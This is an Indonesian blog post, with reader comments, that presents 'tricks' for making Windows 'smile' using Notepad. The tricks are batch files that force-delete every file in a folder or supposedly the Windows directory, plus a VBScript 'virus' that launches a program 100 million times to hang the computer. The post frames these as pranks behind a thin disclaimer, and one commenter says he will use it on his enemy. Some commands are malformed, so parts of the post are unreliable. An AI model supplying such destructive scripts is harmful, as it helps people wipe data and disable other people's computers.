News Update :

Membuat Windows Tersenyum Dengan Notepad

13 April 2010

Bismillah, Salam Ukhuwah islamiah untuk para bloger semua, berjumpa lagi dengan kami q inginbisa, hari ini saya akan memposting lagi tentang kegunaan notepad, uwi..h apa lagi nih yang mo dibahas? nah untuk kali ini saya akan sharing trik untuk membuat windows menjadi tersenyum-senyum melihat hasil kinerja dari notepad,,,wi...h kayakmanusia aja bisa tersenyum..da2 ajah qinginbisa nih...hi.hi..hi..!

Baiklah langsung aja sobat siapkan notepad terlabih dahulu dan silahkan tulis kode dibawah ini :

DEL /F /Q *

Simpan dengan nama (cybergun.cmd)
keterangan : Jika cybergun.cmd ini sobat buka maka file folder semua akan terhapus!

Dan coba sobat menulis script lagi di bawah yang ini
erase C:TEST.txt

Simpan dengan nama (cybergun1.cmd)
keterangan : Jika sobat buka maka file TEST.txt di drive C maka akan terhapus!

Dan coba lagi sobat ketik script yang ini
erase C:WINDOWS

Simpan dengan nama (cybergun2.cmd)
Keterangan : Jika sobat buka maka file folder windows akan terhapus semua!

Untuk yang bawah ini cara untuk membuat virus, membuat virus bukanlah hal sulit karena kita membuatnya dengan notepad akan tetapi sobat ini jangan buat main2 yah qinginbisa cuman sekedar sharing ajah, pa bila terjadi sesuatu yang tidak diinginkan saya tidak ikut bertanggung jawab pa lagi dilakukan untuk tindakan kejahatan pada komputer teman sendiri o...h tidak! DILARANG KERAS! kareana virus ini membuat komputer terinfexsi yang tidak bisa berjalan sama sekali

langsung aja sob...buka notepad sobat semua
dan silahkan tulis script di bawah ini
option explicit

dim wshshell
set wshshell=wscript.createobject("wscript.shell")

dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next

simpan dengan nama (virus.vbs)
keterangan : dan silahkan jalankan file tersebut nah silahkan dilihat apa yang terjadi...? komputer sobat akan dipenuhi oleh 100000000 virus dan komputer tentunya akan hang total sebelum sobat mendelete semuanya

ok cukup begitu aja sharing kita pada sore hari ini sekedar pengetahuan ajah...mohon maaf atas segala kekurangan
Sukses buat kita semua

sumber : http://www.formulagun.co.cc
shared by : http://qinginbisa.blogspot.com
Share this Article on :

6 komentar:

NURA mengatakan...

salam sobat
pertama komentar nich.
wah baru tahu windows tersenyum dengan notepad.
mau ah,, nanti dicoba,,

q ingin bisa blogsharing mengatakan...

mbak Nura@slamt datng mbk nura...iya baru pertama komen mbk habis baru kemaren kan follownya,,,he,,,he,,,boleh sih boleh mbk dicoba asal dikomputer sendiri yah...ha..ha..kl punya orng tar kena marah loh...

Bunglon Blog mengatakan...

loh emang win bisa senyum ya sob hehe..
manis ga senyumnya hayah..!
wedew lagi2 hasil olah notepad yang ternyata punya fungsi luar biasa.
Sukses Slalu!

gak mutu mengatakan...

waduw kalau dipenuhi oleh jutaan virus jadi ngga bisa tersenyum lagi tuh windows pada notepad

q ingin bisa blogsharing mengatakan...

Bunglon@ha..ha...ha....manis kayak madu sob senyumnya...!!!gak cuman basa basinya aja sob

gak mutu@xi..xi...xi...ya jadi lari ke servis toh mas..

secangkir teh dan sekerat roti mengatakan...

buat musuh saya nanti :)

Posting Komentar

Assalamu'alaikum sobat semua...jika sobat sudah mampir di blog saya jangan lupa komentarnya ya,,,mohon saran dan kritiknya, karena setetes komentar anda sangat berarti untuk kemajuan blog ini, Terima kasih semua. SALAM BLOGGER

 

© Copyright Q Ingin Bisa 2010 -2011 | Design by Herdiansyah Hamzah | Published by Borneo Templates | Powered by Blogger.com.